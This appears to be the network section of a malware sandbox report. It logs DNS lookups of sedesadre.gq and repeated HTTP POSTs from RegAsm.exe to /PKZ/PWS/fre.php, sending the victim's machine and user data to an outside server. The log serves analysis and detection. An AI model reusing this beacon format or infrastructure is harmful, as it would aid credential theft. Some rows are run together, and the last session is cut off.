Nov 29, 2022 16:52:32.805339098 CET  49729        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.805402040 CET  49729        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.835335016 CET  80           49729      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.239120960 CET  49730        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.269851923 CET  80           49730      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.269946098 CET  49730        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.273428917 CET  49730        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.300956964 CET  80           49730      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.301081896 CET  49730        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.330792904 CET  80           49730      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.400113106 CET  80           49730      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.400319099 CET  80           49730      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.400346994 CET  49730        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.400450945 CET  49730        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.429719925 CET  80           49730      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.726211071 CET  49731        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.754205942 CET  80           49731      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.754360914 CET  49731        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.757390976 CET  49731        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.785727978 CET  80           49731      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.785821915 CET  49731        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.814914942 CET  80           49731      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.852927923 CET  80           49731      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.853004932 CET  80           49731      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:33.853112936 CET  49731        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.853163958 CET  49731        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:33.880696058 CET  80           49731      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:36.292598963 CET  49732        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:36.320857048 CET  80           49732      141.98.6.102   192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.321800947 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.325134993 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.360413074 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.360503912 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.388890028 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.428849936 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.428942919 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.429011106 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.429080963 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.457051039 CET8049732141.98.6.102192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 16:51:27.731278896 CET | 61178 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:51:27.812835932 CET | 63926 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:51:29.055094004 CET | 53336 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:51:29.128258944 CET | 51007 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:24.965707064 CET | 50024 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:24.983006954 CET | 53 | 50024 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:25.609745979 CET | 49516 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:25.627433062 CET | 53 | 49516 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:27.231417894 CET | 62679 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:27.248811960 CET | 53 | 62679 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:27.735085964 CET | 61392 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:27.754470110 CET | 53 | 61392 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:28.174541950 CET | 52104 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:28.192017078 CET | 53 | 52104 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:28.646147966 CET | 65356 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:28.663779020 CET | 53 | 65356 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:29.136881113 CET | 59006 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:29.469077110 CET | 53 | 59006 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:29.972295046 CET | 51526 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:29.989815950 CET | 53 | 51526 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:30.432616949 CET | 51139 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:30.450237989 CET | 53 | 51139 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:30.865406036 CET | 58784 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:30.884907961 CET | 53 | 58784 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:31.290296078 CET | 57970 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:31.307420969 CET | 53 | 57970 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:31.765007019 CET | 64608 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:31.782563925 CET | 53 | 64608 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:32.148758888 CET | 58746 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:32.166456938 CET | 53 | 58746 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:32.638763905 CET | 62433 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:32.656164885 CET | 53 | 62433 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:33.218455076 CET | 61248 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:33.237142086 CET | 53 | 61248 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:33.705962896 CET | 52750 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:33.725223064 CET | 53 | 52750 | 8.8.8.8 | 192.168.2.7
Nov 29, 2022 16:52:36.268440008 CET | 64078 | 53 | 192.168.2.7 | 8.8.8.8
Nov 29, 2022 16:52:36.289087057 CET | 53 | 64078 | 8.8.8.8 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 16:51:27.731278896 CET | 192.168.2.7 | 8.8.8.8 | 0xba30 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:27.812835932 CET | 192.168.2.7 | 8.8.8.8 | 0xe1a | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:29.055094004 CET | 192.168.2.7 | 8.8.8.8 | 0x8f25 | Standard query (0) | edi4gw.db.files.1drv.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:29.128258944 CET | 192.168.2.7 | 8.8.8.8 | 0xfe5b | Standard query (0) | edi4gw.db.files.1drv.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:24.965707064 CET | 192.168.2.7 | 8.8.8.8 | 0xa4c6 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:25.609745979 CET | 192.168.2.7 | 8.8.8.8 | 0x4b90 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:27.231417894 CET | 192.168.2.7 | 8.8.8.8 | 0xdf42 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:27.735085964 CET | 192.168.2.7 | 8.8.8.8 | 0x3e67 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:28.174541950 CET | 192.168.2.7 | 8.8.8.8 | 0x8a32 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:28.646147966 CET | 192.168.2.7 | 8.8.8.8 | 0xed58 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:29.136881113 CET | 192.168.2.7 | 8.8.8.8 | 0xe22e | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:29.972295046 CET | 192.168.2.7 | 8.8.8.8 | 0xd42a | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:30.432616949 CET | 192.168.2.7 | 8.8.8.8 | 0xaba4 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:30.865406036 CET | 192.168.2.7 | 8.8.8.8 | 0x843c | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:31.290296078 CET | 192.168.2.7 | 8.8.8.8 | 0xcea1 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:31.765007019 CET | 192.168.2.7 | 8.8.8.8 | 0xbf29 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:32.148758888 CET | 192.168.2.7 | 8.8.8.8 | 0x2cc8 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:32.638763905 CET | 192.168.2.7 | 8.8.8.8 | 0xf86b | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:33.218455076 CET | 192.168.2.7 | 8.8.8.8 | 0x904c | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:33.705962896 CET | 192.168.2.7 | 8.8.8.8 | 0x2ec1 | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:36.268440008 CET | 192.168.2.7 | 8.8.8.8 | 0xc48e | Standard query (0) | sedesadre.gq | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 16:51:27.775491953 CET | 8.8.8.8 | 192.168.2.7 | 0xba30 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:27.832566023 CET | 8.8.8.8 | 192.168.2.7 | 0xe1a | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:29.099885941 CET | 8.8.8.8 | 192.168.2.7 | 0x8f25 | No error (0) | edi4gw.db.files.1drv.com | db-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:29.099885941 CET | 8.8.8.8 | 192.168.2.7 | 0x8f25 | No error (0) | db-files.fe.1drv.com | odc-db-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:29.172468901 CET | 8.8.8.8 | 192.168.2.7 | 0xfe5b | No error (0) | edi4gw.db.files.1drv.com | db-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:29.172468901 CET | 8.8.8.8 | 192.168.2.7 | 0xfe5b | No error (0) | db-files.fe.1drv.com | odc-db-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:29.172468901 CET | 8.8.8.8 | 192.168.2.7 | 0xfe5b | No error (0) | l-0003.l-dc-msedge.net | | 13.107.43.12 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:24.983006954 CET | 8.8.8.8 | 192.168.2.7 | 0xa4c6 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:25.627433062 CET | 8.8.8.8 | 192.168.2.7 | 0x4b90 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:27.248811960 CET | 8.8.8.8 | 192.168.2.7 | 0xdf42 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:27.754470110 CET | 8.8.8.8 | 192.168.2.7 | 0x3e67 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:28.192017078 CET | 8.8.8.8 | 192.168.2.7 | 0x8a32 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:28.663779020 CET | 8.8.8.8 | 192.168.2.7 | 0xed58 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:29.469077110 CET | 8.8.8.8 | 192.168.2.7 | 0xe22e | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:29.989815950 CET | 8.8.8.8 | 192.168.2.7 | 0xd42a | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:30.450237989 CET | 8.8.8.8 | 192.168.2.7 | 0xaba4 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:30.884907961 CET | 8.8.8.8 | 192.168.2.7 | 0x843c | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:31.307420969 CET | 8.8.8.8 | 192.168.2.7 | 0xcea1 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:31.782563925 CET | 8.8.8.8 | 192.168.2.7 | 0xbf29 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:32.166456938 CET | 8.8.8.8 | 192.168.2.7 | 0x2cc8 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:32.656164885 CET | 8.8.8.8 | 192.168.2.7 | 0xf86b | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:33.237142086 CET | 8.8.8.8 | 192.168.2.7 | 0x904c | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:33.725223064 CET | 8.8.8.8 | 192.168.2.7 | 0x2ec1 | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:36.289087057 CET | 8.8.8.8 | 192.168.2.7 | 0xc48e | No error (0) | sedesadre.gq | | 141.98.6.102 | A (IP address) | IN (0x0001) | false
• sedesadre.gq
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49716 | 141.98.6.102 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:25.029133081 CET | 2247 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 198
    Connection: close
Nov 29, 2022 16:52:25.057019949 CET | 2247 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: 'ckav.rufrontdesk610930DESKTOP-716T771k08F9C4E9C79A3B52B3F739430Sbol5
Nov 29, 2022 16:52:25.134174109 CET | 2247 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:25 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 15
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49717 | 141.98.6.102 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:26.668343067 CET | 2248 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 198
    Connection: close
Nov 29, 2022 16:52:26.698062897 CET | 2249 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: 'ckav.rufrontdesk610930DESKTOP-716T771+08F9C4E9C79A3B52B3F739430lav9j
Nov 29, 2022 16:52:26.780868053 CET | 2249 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:26 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 15
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.7 | 49726 | 141.98.6.102 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:31.339365005 CET | 2261 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:31.367263079 CET | 2262 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:31.441371918 CET | 2262 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:31 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 11 | Source IP: 192.168.2.7 | Source Port: 49727 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:31.817491055 CET | 2263 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:31.844643116 CET | 2263 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:31.911870003 CET | 2263 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:31 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 12 | Source IP: 192.168.2.7 | Source Port: 49728 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:32.198992968 CET | 2264 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:32.226808071 CET | 2264 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:32.293466091 CET | 2265 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:32 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 13 | Source IP: 192.168.2.7 | Source Port: 49729 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:32.689634085 CET | 2266 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:32.718297958 CET | 2266 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:32.805161953 CET | 2266 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:32 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 14 | Source IP: 192.168.2.7 | Source Port: 49730 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:33.273428917 CET | 2267 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:33.301081896 CET | 2267 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:33.400113106 CET | 2268 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:33 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 15 | Source IP: 192.168.2.7 | Source Port: 49731 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:33.757390976 CET | 2268 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:33.785821915 CET | 2269 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:33.852927923 CET | 2269 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:33 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 16 | Source IP: 192.168.2.7 | Source Port: 49732 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:36.325134993 CET | 2270 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:36.360503912 CET | 2270 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:36.428849936 CET | 2270 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:36 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49718 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:27.285135984 CET | 2250 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
